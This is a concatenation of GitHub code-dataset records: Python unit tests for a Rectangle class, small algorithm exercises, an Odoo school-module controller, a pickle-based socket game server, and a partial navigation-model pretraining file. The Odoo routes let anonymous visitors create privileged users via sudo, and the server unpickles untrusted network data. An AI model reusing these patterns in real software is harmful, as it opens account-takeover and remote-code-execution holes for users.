self.assertRaises(ValueError):\n r6.height = 0\n with self.assertRaises(TypeError):\n r7 = Rectangle()\n with self.assertRaises(TypeError):\n r8 = Rectangle(3.14159, 1)\n with self.assertRaises(TypeError):\n r9 = Rectangle(3, 1.41421)\n with self.assertRaises(TypeError):\n r10 = Rectangle(3, 1, 3.14159, 1)\n with self.assertRaises(TypeError):\n r11 = Rectangle(3, 1, 3, 1.41421)\n\n def test_area(self):\n \"\"\"Testing area\n \"\"\"\n r8 = Rectangle(3, 2)\n self.assertEqual(r8.area(), 6)\n r9 = Rectangle(8, 7, 0, 0, 12)\n self.assertEqual(r9.area(), 56)\n\n\n def test_display(self):\n \"\"\"Testing display\n \"\"\"\n r1 = Rectangle(4, 6)\n capturedOutput1 = io.StringIO()\n sys.stdout = capturedOutput1\n r1.display()\n self.assertEqual(capturedOutput1.getvalue(),\n \"####\\n####\\n####\\n####\\n####\\n####\\n\")\n r2 = Rectangle(2, 3, 2, 2)\n capturedOutput2 = io.StringIO()\n sys.stdout = capturedOutput2\n r2.display()\n self.assertEqual(capturedOutput2.getvalue(),\n \"\\n\\n ##\\n ##\\n ##\\n\")\n r3 = Rectangle(2, 3, 0, 2)\n capturedOutput3 = io.StringIO()\n sys.stdout = capturedOutput3\n r3.display()\n self.assertEqual(capturedOutput3.getvalue(),\n \"\\n\\n##\\n##\\n##\\n\")\n r4 = Rectangle(2, 3, 2, 0)\n capturedOutput4 = io.StringIO()\n sys.stdout = capturedOutput4\n r4.display()\n self.assertEqual(capturedOutput4.getvalue(),\n \" ##\\n ##\\n ##\\n\")\n sys.stdout = sys.__stdout__\n\n def test_print(self):\n \"\"\"Testing print\n \"\"\"\n r1 = Rectangle(4, 6, 2, 1, 12)\n capturedOutput1 = io.StringIO()\n sys.stdout = capturedOutput1\n print(r1)\n self.assertEqual(capturedOutput1.getvalue(),\n \"[Rectangle] (12) 2/1 - 4/6\\n\")\n r2 = Rectangle(5, 5, 1)\n capturedOutput2 = io.StringIO()\n sys.stdout = capturedOutput2\n print(r2)\n self.assertEqual(capturedOutput2.getvalue(),\n \"[Rectangle] (1) 1/0 - 5/5\\n\")\n sys.stdout = sys.__stdout__\n\n def test_update(self):\n \"\"\"Testing update\n \"\"\"\n r1 = Rectangle(10, 10, 10, 10)\n capturedOutput1 = io.StringIO()\n sys.stdout = capturedOutput1\n print(r1)\n self.assertEqual(capturedOutput1.getvalue(),\n \"[Rectangle] (1) 10/10 - 10/10\\n\")\n r1.update(89, 2, 3, 4, 5)\n capturedOutput2 = io.StringIO()\n sys.stdout = capturedOutput2\n print(r1)\n self.assertEqual(capturedOutput2.getvalue(),\n \"[Rectangle] (89) 4/5 - 2/3\\n\")\n r1.update()\n capturedOutput3 = io.StringIO()\n sys.stdout = capturedOutput3\n print(r1)\n self.assertEqual(capturedOutput3.getvalue(),\n \"[Rectangle] (89) 4/5 - 2/3\\n\")\n r1.update(y=1, width=4, x=3, id=88)\n capturedOutput4 = io.StringIO()\n sys.stdout = capturedOutput4\n print(r1)\n self.assertEqual(capturedOutput4.getvalue(),\n \"[Rectangle] (88) 3/1 - 4/3\\n\")\n r1.update(x=1, height=4, y=3, width=2)\n capturedOutput5 = io.StringIO()\n sys.stdout = capturedOutput5\n print(r1)\n self.assertEqual(capturedOutput5.getvalue(),\n \"[Rectangle] (88) 1/3 - 2/4\\n\")\n sys.stdout = sys.__stdout__\n\n def test_dict(self):\n \"\"\"Testing to_dict\n \"\"\"\n r1 = Rectangle(10, 2, 1, 9)\n self.assertEqual(r1.to_dictionary(), {'x': 1, 'y': 9, 'id': 1,\n 'height': 2, 'width': 10})\n self.assertEqual(type(r1.to_dictionary()), dict)\n r2 = Rectangle(1, 1)\n r2.update(**r1.to_dictionary())\n self.assertEqual(r2.to_dictionary(), {'x': 1, 'y': 9, 'id': 1,\n 'height': 2, 'width': 10})\n self.assertNotEqual(r1, r2)\n\n def test_json(self):\n \"\"\"Testing json\n \"\"\"\n r1 = Rectangle(10, 7, 2, 8)\n self.assertEqual(r1.to_dictionary(), {'x': 2, 'width': 10, 'id': 1,\n 'height': 7, 'y': 8})\n json = Base.to_json_string([r1.to_dictionary()])\n self.assertEqual(type(json), str)\n r2 = Rectangle(2, 4)\n Rectangle.save_to_file([r1, r2])\n capturedOutput = io.StringIO()\n sys.stdout = capturedOutput\n with open(\"Rectangle.json\", \"r\") as file:\n self.assertEqual(type(file.read()), str)\n list_rectangles_input = [r1, r2]\n Rectangle.save_to_file(list_rectangles_input)\n list_rectangles_output = Rectangle.load_from_file()\n capturedOutput2 = io.StringIO()\n sys.stdout = capturedOutput2\n for rect in list_rectangles_input:\n print(rect)\n for rect in list_rectangles_output:\n print(rect)\n self.assertEqual(capturedOutput2.getvalue(),\n \"[Rectangle] (1) 2/8 - 10/7\\n\"\n \"[Rectangle] (2) 0/0 - 2/4\\n\"\n \"[Rectangle] (1) 2/8 - 10/7\\n\"\n \"[Rectangle] (2) 0/0 - 2/4\\n\")\n self.assertNotEqual(id(list_rectangles_input[0]),\n id(list_rectangles_output[0]))\n self.assertNotEqual(id(list_rectangles_input[1]),\n id(list_rectangles_output[1]))\n sys.stdout = sys.__stdout__\n\n def test_csv(self):\n \"\"\"Testing csv\n \"\"\"\n r1 = Rectangle(10, 7, 2, 8)\n r2 = Rectangle(2, 4)\n list_rectangles_input = [r1, r2]\n Rectangle.save_to_file_csv(list_rectangles_input)\n list_rectangles_output = Rectangle.load_from_file_csv()\n capturedOutput = io.StringIO()\n sys.stdout = capturedOutput\n for rect in list_rectangles_input:\n print(rect)\n for rect in list_rectangles_output:\n print(rect)\n self.assertEqual(capturedOutput.getvalue(),\n \"[Rectangle] (1) 2/8 - 10/7\\n\"\n \"[Rectangle] (2) 0/0 - 2/4\\n\"\n \"[Rectangle] (1) 2/8 - 10/7\\n\"\n \"[Rectangle] (2) 0/0 - 2/4\\n\")\n sys.stdout = sys.__stdout__\n self.assertNotEqual(id(list_rectangles_input[0]),\n id(list_rectangles_output[0]))\n self.assertNotEqual(id(list_rectangles_input[1]),\n id(list_rectangles_output[1]))\n","repo_name":"c-eng/holbertonschool-higher_level_programming","sub_path":"0x0C-python-almost_a_circle/tests/test_models/test_rectangle.py","file_name":"test_rectangle.py","file_ext":"py","file_size_in_byte":8335,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"10375096455","text":"import sys\r\ninput = sys.stdin.readline\r\n\r\nm, n = map(int, input().split())\r\nboard = [['' for _ in range(n)] for _ in range(m)]\r\nfor i in range(m):\r\n s = input().strip()\r\n for j in range(n):\r\n board[i][j] = s[j]\r\n\r\nnext_color = {'W': 'B', 'B': 'W'}\r\n\r\n\r\ndef make_chess(y, x, color):\r\n painting = 0\r\n for ny in range(y, y+8):\r\n for nx in range(x, x+8):\r\n if board[ny][nx] != color:\r\n painting += 1\r\n color = next_color[color]\r\n color = next_color[color]\r\n return painting\r\n\r\n\r\nanswer = float('inf')\r\nfor i in range(m):\r\n for j in range(n):\r\n if i+8 <= m and j+8 <= n:\r\n cnt = min(make_chess(i, j, 'B'), make_chess(i, j, 'W'))\r\n answer = min(answer, cnt)\r\nprint(answer)\r\n","repo_name":"yejin7211/Algorithm","sub_path":"백준/Silver/1018. 체스판 다시 칠하기/체스판 다시 칠하기.py","file_name":"체스판 다시 칠하기.py","file_ext":"py","file_size_in_byte":773,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"24437899802","text":"#Find The Missing Number\ndef MissingNumber(arr):\n CyclicSort(arr) \n for i in range(len(arr)):\n if( arr[i] != i):\n return i\n return len(arr)\n\n#Numbers Dissappeared in an array\ndef DissappearedNumbers(arr):\n CyclicSort(arr)\n ans = []\n for i in range(len(arr)):\n if(arr[i] != i):\n ans.append(i)\n return ans\n\ndef CyclicSort(arr):\n i = 0\n while i < len(arr):\n #correct arr[i]-1 if array starts form 0\n correct = arr[i] \n if arr[i] < len(arr) and not arr[i] == arr[correct]:\n swap(arr, i, correct)\n else:\n i += 1\n return arr\n\ndef swap(arr,first,last):\n temp = arr[first]\n arr[first]=arr[last]\n arr[last]=temp\n\n\narr = [4, 3, 2, 7, 8, 2, 3, 1]\nprint(CyclicSort(arr))\nprint(MissingNumber(arr))\nprint(DissappearedNumbers(arr))","repo_name":"Aym-n/DSA_Bootcamp_Python","sub_path":"Sorting/CycleSort.py","file_name":"CycleSort.py","file_ext":"py","file_size_in_byte":846,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"22305969976","text":"from odoo import http\nfrom odoo.http import request\nfrom odoo.addons.auth_signup.controllers.main import AuthSignupHome\nimport base64\nimport xmlrpc.client\n\nfrom odoo.addons.auth_oauth.controllers.main import OAuthLogin\n\n\nclass Teacherdata(http.Controller):\n \n @http.route('/teacher_webform', type='http' , auth=\"public\" , website='True')\n def school_form(self,**kw):\n \n \n # pr = request.env['res.users'].search([])\n \n # print(pr,'==-=-=-==-==-=-==-=-=--==-=-==')\n # for i in pr:\n # print(i.login)\n pr = request.session.uid\n print(type(pr))\n data = request.env['res.users'].browse(pr)\n print(type(data))\n for i in data:\n t = request.session['op'] = i.role\n print(t) \n \n if \"Hr\" == t:\n return http.request.render('school.create_teacher')\n \n return \"this page is not aacessble you\" \n \n \n \n \n \n @http.route('/teacher', type='http' , auth=\"user\" , website='True') \n def teacher(self, **kw):\n # print(\"data has been cretaed.....\", kw)\n \n file = request.httprequest.files.get(\"file\").read()\n \n file = base64.b64encode(file)\n \n print(file)\n name = kw['name']\n email = kw['email']\n gender = kw['gender']\n phone = kw['phone']\n \n \n abc = request.env['school.profile'].create({'name':name, 'email':email ,\n 'gender':gender, 'phone':phone})\n print(abc,\"======================================\")\n return \"data cretaed\"\n \n \n @http.route('/demo', type='http' , auth=\"public\" , website='True')\n def public_page(self,**kw):\n\n return http.request.render('school.public_page')\n \n \n @http.route('/lols', type='http' , auth=\"public\" , website='True')\n def public_page(self,**kw):\n\n return http.request.render('school.detail')\n \n \n \n @http.route('/att', type='http' , auth=\"public\" , website='True')\n def attt(self,**kw):\n return http.request.render('school.send_attechments')\n\n\n @http.route('/project/uploaded', type='http', auth=\"public\", website=True)\n def upload_files(self, **post):\n values = {}\n if post.get('attachment',False):\n Attachments = request.env['ir.attachment']\n name = post.get('attachment').filename \n file = post.get('attachment')\n project_id = post.get('project_id')\n attachment = file.read() \n attachment_id = Attachments.sudo().create({\n 'name':name,\n 'datas_fname': name,\n 'res_name': name,\n 'type': 'binary', \n 'res_model': 'attachment.files',\n 'res_id': project_id,\n 'datas': attachment.encode('base64'),\n })\n value = {\n 'attachment' : attachment_id\n }\n print(value)\n return request.render(\"modulename.template_to_render\", value)\n \n # return \"data created\"\n \n \n \n \n \n \n#=======----------=--=\\--\\--=-\\--- Inherit controller and url =-\\-=\\---------======================================= \n\n \n \nclass Inherit_teacher_class(Teacherdata):\n\n # Inherit exsisting url \n \n @http.route('/shop', type='http' , auth=\"user\" , website='True')\n def shop_data(self,**kw):\n # res = super(Inherit_teacher_class, self).shop_data(page=0,**kw) # if need then use super both functionality work existing and new \n print(\"this is new url for shop --------------\")\n # return res\n return http.request.render('school.shops')\n \n \n \n # inherit controller \n \n @http.route('/teacher_webform', type='http' , auth=\"public\" , website='True')\n def school_form(self,**kw):\n res = super(Inherit_teacher_class, self).school_form(page=0,**kw) # if need then use super both functionality work existing and new \n print(\"=======----------=--=\\--\\--=-\\---=-\\-=\\-------- from Inherit_teacher_class\")\n print('-==-----=-=-=-=', res.qcontext, '=================================================' )\n return res\n \n\n @http.route('/schooldata', type='http' , auth=\"public\" , website='True')\n def school_data(self,**kw):\n print('fjdskfjjsdflsjd')\n op = request.env['school.profile'].search([])\n print(op)\n \n return http.request.render(\"school.sdata\", {'op':op})\n \n \n \nclass signupcustom(AuthSignupHome):\n \n \n @http.route('/loginform', type='http', auth='public', website=True, sitemap=False)\n def loginform(self, *args, **kw):\n \n return http.request.render('school.login')\n \n \n \n @http.route('/logins', type='http', auth='public', website=True, sitemap=False)\n def logincheck(self, *args, **kw):\n url = 'http://0.0.0.0:8069'\n db = 'backup_odoo_15_login' \n login = kw['login'] \n password = kw['password'] \n \n print(login,'lolollllll-=-=-==--=-=-=--=-=-=--=')\n \n common = xmlrpc.client.ServerProxy('{}/xmlrpc/2/common'.format(url))\n print(common, 'comman in odoo -=----=------=-=-=')\n uid = common.authenticate(db,login, password, {})\n \n if uid:\n print(\"thsi authentication succesfully\")\n return http.request.render('school.shops')\n # return uid, url, db, common, password\n\n \n else:\n print(\"auth failed\")\n \n # o = super(OAuthLogin, self).web_login(*args, **kw) \n return \"dsflsdklk\"\n \n \n \n \n \n @http.route('/web/signup', type='http', auth='public', website=True, sitemap=False)\n def testdata(self, *args, **kw):\n \n return http.request.render('school.abcd')\n \n \n \n @http.route('/test', type='http', auth='public', website=True, sitemap=False)\n def web_auth_signup(self, *args, **kw):\n print()\n print(\"this sc lalla =====0=0\")\n print()\n role = kw['role']\n login = kw['login']\n password = kw['password']\n name = kw['name']\n \n \n pr = request.env['res.users'].search([])\n \n print(pr,'==-=-=-==-==-=-==-=-=--==-=-==')\n # for i in pr:\n # o = i.login\n # print(o,'in the funxction=\\=\\==\\==\\=\\==\\=\\\\=s')\n # return \"enter other username\"\n \n request.env['res.users'].sudo().create({'role':role, 'login':login , 'password':password,'name':name})\n \n print('=\\\\\\=====================================')\n \n p = request.session['names'] = role\n \n print( p, \"this is from inhertoimg ...... sign up form\")\n \n \n # response = super(signupcustom, self).web_auth_signup(*args, **kw)\n \n return 'data is created'\n \n\n \n \n # @http.route('/web/login', type='http', auth='public', website=True, sitemap=False)\n # def web_login(self, *args, **kw):\n # print()\n # print()\n # print()\n \n # print(request.params['login'], request.params['password']) \n \n # request.session['names'] = 'saas'\n # print(kw, 'kw===============================')\n # pr = request.session.uid\n \n # print(pr,'prprprprprpprprprooppopo-=-=====-=-=---')\n # data = request.env['res.users'].browse(pr)\n # print(data, '===---=-====-==-=-=--=--=-0=0-=0=0=-0=0=0=0=00 ')\n # for i in data:\n # o = i.role\n # p = request.session['roles'] = kw\n # print(p, \"this is -=-=-==-==-=-=-=-=--=-===--=-=----==-\")\n # data = super(signupcustom, self).web_login(*args, **kw)\n \n # return data\n \n @http.route('/web/login', type='http', auth='public', website=True, sitemap=False)\n def web_login(self, *args, **kw):\n print(kw , \"this is from inherit web logins\")\n print(kw, '-------------------')\n data = super(signupcustom, self).web_login(*args, **kw)\n # a = request.env['res.users'].search([])\n # for i in a:\n # print(i.role)\n # print(a)\n # print(\"-=-=-=\")\n # if request.session.uid:\n # pr = request.session.uid\n \n # dataa = request.env['res.users'].browse(pr)\n # for i in dataa:\n # print(i)\n \n # print(dataa)\n \n print(data , '----------------------------------')\n return data\n\n\n \n\n # @http.route('/web/signup', type='http', auth='public', website=True, sitemap=False)\n # def web_auth_signup(self , *args,**kw):\n # res = super(signupcustom , self).web_auth_signup(*args, **kw)\n # op = request.session['names'] = lambda self: self.env.user\n # print(op,'oopopoppopopopopopop90909009909090----==-=-=∂')\n # return res\n \n\n \n # @http.route('/test', type='http', auth='public', website=True, sitemap=False)\n # def web_auth_signup(self, *args, **kw):\n \n # abc = request.env['res.users'].create(kw)\n # print(abc.role, '-=-=-=-=-=-==-==-888888888888888888888888888')\n # res = super(signupcustom , self).web_auth_signup(*args, **kw)\n # print(abc, 'this is add field in sign up form n -=-===-==-=-=-=--=-=-=-==--=-==--=--=-=-=-=-==-=----====-=') \n # # response = super(signupcustom, self).web_auth_custom(**kw)\n # print( 'call from inherit users ontrolers -=-==-=-=--=-=-=-=--= -=- -=- users ===--=-=-==--=---')\n # res = request.render('auth_signup.signup')\n # return res\n \n \n # custom make signup\n \n \n \nclass Fileattechments(http.Controller):\n \n @http.route('/abc', type='http', auth='public', website=True, sitemap=False)\n def abc(self, *args, **kw):\n return http.request.render('school.attechments')\n\n @http.route('/attach', type='http', auth='public', website=True, sitemap=False)\n def attechments_file(self, *args, **kw):\n # data = request.env['attachment.files'].create(kw)\n \n files = request.httprequest.files.get(\"attachment\").read()\n print(files, '-=-=-=-=--=-=0-=-=-=-==')\n resume = base64.b64encode(files)\n print(resume, '-=-=-=-=-=-=-=-==\\=\\=\\====')\n bytes = resume.decode('utf8')\n print(bytes, '-=-=-=-==---=-\\-=\\-\\---=--=')\n # print(files, 'ioioioioioioioopoppopop8909009090909090-=789789-=')\n # resume = io.BytesIO(base64.b64decode(files))\n \n \n \n op = request.env['attachment.files'].create({'attachment':bytes})\n print(op,'------=-==-=-=-=-=-=-=-==--=-=-=')\n return \"data is create ed\" \n\n\n @http.route('/attach_view', type='http', auth='public', website=True, sitemap=False)\n def aaa(self, *args, **kw):\n \n op = request.env['attachment.files'].search([])\n \n return http.request.render('school.datass' , {'op':op})","repo_name":"gautamsinh007/odoo_login_demo","sub_path":"addons/school/controllers/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":11341,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"3078366370","text":"from matplotlib import pyplot as plt\n\nx = [1, 2, 3, 4, 5]\ny = [1, 4, 9, 16, 25]\n\nimport numpy as np\na = np.array(x)\nb = np.array(y)\nplt.plot(a, b)\n\nimport cv2\ngray_img = cv2.imread('images/sandstone.tif', 0)\n\nplt.imshow(gray_img, cmap=\"gray\")\nplt.show()\n\nplt.hist(gray_img.flat, bins=100, range=(0,255)) # gray_img.flat flattens a 2D array to 1D\nplt.show()","repo_name":"juanvalen15/imageProcessingPython","sub_path":"p003-plotting.py","file_name":"p003-plotting.py","file_ext":"py","file_size_in_byte":356,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73643583093","text":"import socket\nfrom _thread import *\nimport pickle\nfrom game import Game\nimport sys\n\nPORT = 5555\nSERVER = socket.gethostbyname(socket.gethostname())\n\n# SERVER = \"\"\nADDR = (SERVER, PORT)\nserver = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\ntry:\n server.bind(ADDR)\nexcept socket.error as e:\n str(e)\n\nserver.listen(2)\nprint(\"SERVER UP: Waiting for Connections..\")\n\n# this will carry the game instances\ngames = {}\nidCount = 0\n\n\ndef threaded_client(conn, p, gameId):\n global idCount\n\n # When a connection is made initially, send back player object\n # Before sending -> encode and serialize data\n # check if p is 0 or 1, odd or even. this will determine what player to send back\n # this sends back player position\n if p % 2 == 0:\n conn.send(pickle.dumps(games[gameId].player1))\n else:\n conn.send(pickle.dumps(games[gameId].player2))\n\n reply = \"\"\n while True:\n try:\n # this should be the current players position\n data = pickle.loads(conn.recv(2048))\n\n if not data:\n print(\"Disconnected, Server didnt receive data\")\n break\n # put this into the games object, players position\n # check which player\n if p % 2 == 0:\n games[gameId].player1 = data\n else:\n games[gameId].player2 = data\n\n if p % 2 == 0:\n reply = games[gameId].player2\n else:\n reply = games[gameId].player1\n\n conn.sendall(pickle.dumps(reply))\n except:\n break\n\n print(\"Lost connection\")\n try:\n del games[gameId]\n print(\"Closing Game\", gameId)\n except:\n pass\n idCount -= 1\n conn.close()\n\n\nwhile True:\n conn, addr = server.accept()\n print(\"Connected to:\", addr)\n\n idCount += 1\n p = 0\n gameId = (idCount - 1) // 2\n if idCount % 2 == 1:\n games[gameId] = Game(gameId)\n print(\"Creating a new game...\")\n else:\n games[gameId].ready = True\n p = 1\n\n start_new_thread(threaded_client, (conn, p, gameId))\n","repo_name":"daveeS987/v2socket","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":2110,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"23068213759","text":"from collections import defaultdict\nimport os\nimport sys\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport h5py \nimport numpy as np \nfrom transformers import BertPreTrainedModel\nfrom .vilmodel import BertXAttention\nfrom .vilmodel import BertLayerNorm, BertOnlyMLMHead, GlocalTextPathCMT\nfrom .ops import pad_tensors_wgrad, gen_seq_masks\n\nROOM2IND = {'balcony' : 23, 'bathroom': 0, 'classroom': 26, 'dining_booth': 27, 'entryway': 4, 'garage': 6, \n 'junk': 29, 'laundryroom': 9, 'living room': 11, 'meetingroom': 12, 'other_room': 24, 'porch': 15,\n 'spa': 28, 'toilet': 18, 'utilityroom': 19, 'bar': 25, 'bedroom': 1, 'closet': 2,\n 'dining_room': 3, 'familyroom': 5, 'hallway': 7, 'kitchen': 10, 'library': 8, 'lounge': 13,\n 'office': 14, 'outdoor': 22,'rec': 16, 'stairs': 17, 'tv': 20, 'workout': 21,\n}\n\nIND2ROOM={ 23: 'balcony', 0: 'bathroom', 26: 'classroom', 27: 'dining_booth',4: 'entryway', 6: 'garage',\n 29: 'junk', 9: 'laundryroom', 11: 'living room', 12: 'meetingroom',24:'other_room', 15: 'porch',\n 28: 'spa', 18: 'toilet', 19 :'utilityroom', 25:'bar', 1:'bedroom', 2: 'closet',\n 3: 'dining_room', 5: 'familyroom', 7 :'hallway', 10: 'kitchen', 8:'library', 13: 'lounge',\n 14: 'office', 12: 'outdoor', 16: 'rec', 17: 'stairs', 20:'tv', 21: 'workout'\n}\n\nclass RegionClassification(nn.Module):\n \" for MRC(-kl)\"\n def __init__(self, hidden_size, label_dim):\n super().__init__()\n self.net = nn.Sequential(nn.Linear(hidden_size, hidden_size),\n nn.ReLU(),\n BertLayerNorm(hidden_size, eps=1e-12),\n nn.Linear(hidden_size, label_dim))\n\n def forward(self, input_):\n output = self.net(input_)\n return output\n\n\nclass ClsPrediction(nn.Module):\n def __init__(self, hidden_size, input_size=None):\n super().__init__()\n if input_size is None:\n input_size = hidden_size\n self.net = nn.Sequential(nn.Linear(input_size, hidden_size),\n nn.ReLU(),\n BertLayerNorm(hidden_size, eps=1e-12),\n nn.Linear(hidden_size, 1))\n\n def forward(self, x):\n return self.net(x)\n\nclass RoomPrediction(nn.Module):\n def __init__(self, output_size, input_size, hidden_size=None):\n super().__init__()\n if hidden_size is None:\n hidden_size = input_size \n self.net = nn.Sequential(nn.Linear(input_size, hidden_size),\n nn.ReLU(),\n nn.Linear(hidden_size, output_size))\n \n def forward(self, x):\n return self.net(x)\n\n\nclass RoomPredictionImg(nn.Module):\n def __init__(self, config, output_size, input_size):\n super().__init__()\n print(\"Use img embed rt head !\")\n self.room_type_list = []\n if config.rp_embed_dir is not None:\n rp_order = sorted(ROOM2IND.items(), key=lambda x: x[1])\n rp_embed_file = h5py.File(config.rp_embed_dir,\"r\")\n for r in rp_order:\n if config.use_clip_feat:\n rp_embed = rp_embed_file[r[0]+'_clip'][...][:, :config.image_feat_size]\n else:\n rp_embed = rp_embed_file[r[0]+'_imgnet_feat'][...][:, :config.image_feat_size]\n if len(rp_embed.shape) == 4:\n rp_embed = np.squeeze(rp_embed)\n rp_img_tensor = torch.from_numpy(rp_embed)\n linear = nn.Linear(input_size, output_size).cuda()\n \n linear.weight.data.copy_(rp_img_tensor.cuda())\n self.room_type_list.append(linear)\n \n if not config.update_rp_embed:\n for layer in self.room_type_list:\n for para in layer.parameters():\n para.requires_grad = False\n \n def forward(self, view_feat):\n outs = []\n for layer in self.room_type_list:\n outs.append(torch.sum(layer(view_feat),dim=-1).unsqueeze(-1))\n outs = torch.cat(outs,dim=-1)\n return outs \n\n\nclass NodeDistReg(nn.Module):\n def __init__(self, input_size, config, hidden_size=None):\n super().__init__()\n self.config = config\n if hidden_size is None:\n hidden_size = input_size \n\n self.cross_attn = BertXAttention(config, ctx_dim=768)\n self.score_net = nn.Sequential(\n nn.Linear(input_size, hidden_size),\n nn.ReLU(),\n BertLayerNorm(hidden_size, eps=1e-12),\n nn.Linear(hidden_size, 1)\n )\n self.dreamer_fuse_linear = ClsPrediction(self.config.hidden_size, input_size=self.config.hidden_size*2)\n self.dist_sap_head = ClsPrediction(self.config.hidden_size)\n \n def forward(self, x, ins_img_features):\n ins_img_features = ins_img_features #torch.from_numpy(ins_img_features).float().to(x.device)\n attention_output, attention_scores = self.cross_attn(x, ins_img_features)\n fuse_weight = torch.sigmoid(self.dreamer_fuse_linear(\n torch.cat([x[:, 0], attention_output[:, 0]], 1)\n ))\n return None, self.dist_sap_head(attention_output).squeeze(2), fuse_weight\n\n\nclass GlocalTextPathCMTPreTraining(BertPreTrainedModel):\n def __init__(self, config):\n super().__init__(config)\n\n self.config = config\n self.bert = GlocalTextPathCMT(config)\n\n if 'mlm' in config.pretrain_tasks:\n self.mlm_head = BertOnlyMLMHead(self.config)\n if 'mrc' in config.pretrain_tasks:\n self.image_classifier = RegionClassification(self.config.hidden_size, self.config.image_prob_size)\n if self.config.obj_prob_size > 0 and self.config.obj_prob_size != self.config.image_prob_size:\n self.obj_classifier = RegionClassification(self.config.hidden_size, self.config.obj_prob_size)\n else:\n self.obj_classifier = None\n\n if 'sap' in config.pretrain_tasks:\n self.global_sap_head = ClsPrediction(self.config.hidden_size)\n self.local_sap_head = ClsPrediction(self.config.hidden_size)\n if config.glocal_fuse:\n self.sap_fuse_linear = ClsPrediction(self.config.hidden_size, input_size=self.config.hidden_size*2)\n else:\n self.sap_fuse_linear = None\n \n if 'distsap' in config.pretrain_tasks:\n self.node_dis_reg_head = NodeDistReg(input_size=self.config.hidden_size, config=config)\n self.global_sap_head = ClsPrediction(self.config.hidden_size)\n self.global_distsap_head = ClsPrediction(self.config.hidden_size)\n self.local_sap_head = ClsPrediction(self.config.hidden_size)\n self.sap_fuse_linear = ClsPrediction(self.config.hidden_size, input_size=self.config.hidden_size*2)\n self.sap_global_fuse_linear = ClsPrediction(self.config.hidden_size, input_size=self.config.hidden_size*2)\n self.global_img_linear = ClsPrediction(self.config.hidden_size, input_size=self.config.hidden_size*2)\n\n if 'og' in config.pretrain_tasks:\n self.og_head = ClsPrediction(self.config.hidden_size)\n \n if 'rt' in config.pretrain_tasks:\n if not config.use_fix_rt_emb:\n self.rt_head = RoomPrediction(output_size=30, \n input_size=self.config.hidden_size)\n else:\n self.rt_head = RoomPredictionImg(config,output_size=10,\n input_size=self.config.hidden_size)\n\n self.init_weights()\n self.tie_weights()\n\n def tie_weights(self):\n if 'mlm' in self.config.pretrain_tasks:\n self._tie_or_clone_weights(self.mlm_head.predictions.decoder,\n self.bert.embeddings.word_embeddings)\n\n def forward(self, batch, task, compute_loss=True):\n batch = defaultdict(lambda: None, batch)\n if task.startswith('mlm'):\n return self.forward_mlm(\n batch['txt_ids'], batch['txt_lens'], batch['traj_view_img_fts'], \n batch['traj_obj_img_fts'], batch['traj_loc_fts'], batch['traj_nav_types'], \n batch['traj_step_lens'], batch['traj_vp_view_lens'], batch['traj_vp_obj_lens'], \n batch['traj_vpids'], batch['traj_cand_vpids'], \n batch['gmap_lens'], batch['gmap_step_ids'], batch['gmap_pos_fts'], \n batch['gmap_pair_dists'], batch['gmap_vpids'], batch['vp_pos_fts'],\n batch['txt_labels'], compute_loss\n )\n elif task.startswith('mrc'):\n return self.forward_mrc(\n batch['txt_ids'], batch['txt_lens'], batch['traj_view_img_fts'], \n batch['traj_obj_img_fts'], batch['traj_loc_fts'], batch['traj_nav_types'], \n batch['traj_step_lens'], batch['traj_vp_view_lens'], batch['traj_vp_obj_lens'], \n batch['traj_vpids'], batch['traj_cand_vpids'], \n batch['gmap_lens'], batch['gmap_step_ids'], batch['gmap_pos_fts'], \n batch['gmap_pair_dists'], batch['gmap_vpids'], batch['vp_pos_fts'],\n batch['vp_view_mrc_masks'], batch['vp_view_probs'], \n batch['vp_obj_mrc_masks'], batch['vp_obj_probs'], compute_loss\n )\n elif task.startswith('sap'):\n return self.forward_sap(\n batch['txt_ids'], batch['txt_lens'], batch['traj_view_img_fts'], \n batch['traj_obj_img_fts'], batch['traj_loc_fts'], batch['traj_nav_types'], \n batch['traj_step_lens'], batch['traj_vp_view_lens'], batch['traj_vp_obj_lens'], \n batch['traj_vpids'], batch['traj_cand_vpids'], \n batch['gmap_lens'], batch['gmap_step_ids'], batch['gmap_pos_fts'], \n batch['gmap_pair_dists'], batch['gmap_vpids'], batch['vp_pos_fts'],\n batch['gmap_visited_masks'],\n batch['global_act_labels'], batch['local_act_labels'], compute_loss\n )\n elif task.startswith('og'):\n return self.forward_og(\n batch['txt_ids'], batch['txt_lens'], batch['traj_view_img_fts'], \n batch['traj_obj_img_fts'], batch['traj_loc_fts'], batch['traj_nav_types'], \n batch['traj_step_lens'], batch['traj_vp_view_lens'], batch['traj_vp_obj_lens'], \n batch['traj_vpids'], batch['traj_cand_vpids'], \n batch['gmap_lens'], batch['gmap_step_ids'], batch['gmap_pos_fts'], \n batch['gmap_pair_dists'], batch['gmap_vpids'], batch['vp_pos_fts'],\n batch['obj_labels'], compute_loss\n )\n elif task.startswith('rt'):\n return self.forward_rt(\n batch['txt_ids'], batch['txt_lens'], batch['traj_view_img_fts'],\n batch['traj_obj_img_fts'],batch['traj_loc_fts'],batch['traj_nav_types'],\n batch['traj_step_lens'],batch['traj_vp_view_lens'],batch['traj_vp_obj_lens'],\n batch['traj_vpids'], batch['traj_cand_vpids'],\n batch['gmap_lens'], batch['gmap_step_ids'], batch['gmap_pos_fts'],\n batch['gmap_pair_dists'], batch['gmap_vpids'], batch['gmap_rt_labels'],\n batch['vp_pos_fts'], batch['gmap_vpids_mask'],compute_loss\n )\n elif task.startswith('distsap'):\n return self.forward_dsap(\n batch['txt_ids'], batch['txt_lens'],batch['traj_view_img_fts'],\n batch['traj_obj_img_fts'], batch['traj_loc_fts'], batch['traj_nav_types'],\n batch['traj_step_lens'], batch['traj_vp_view_lens'],batch['traj_vp_obj_lens'],\n 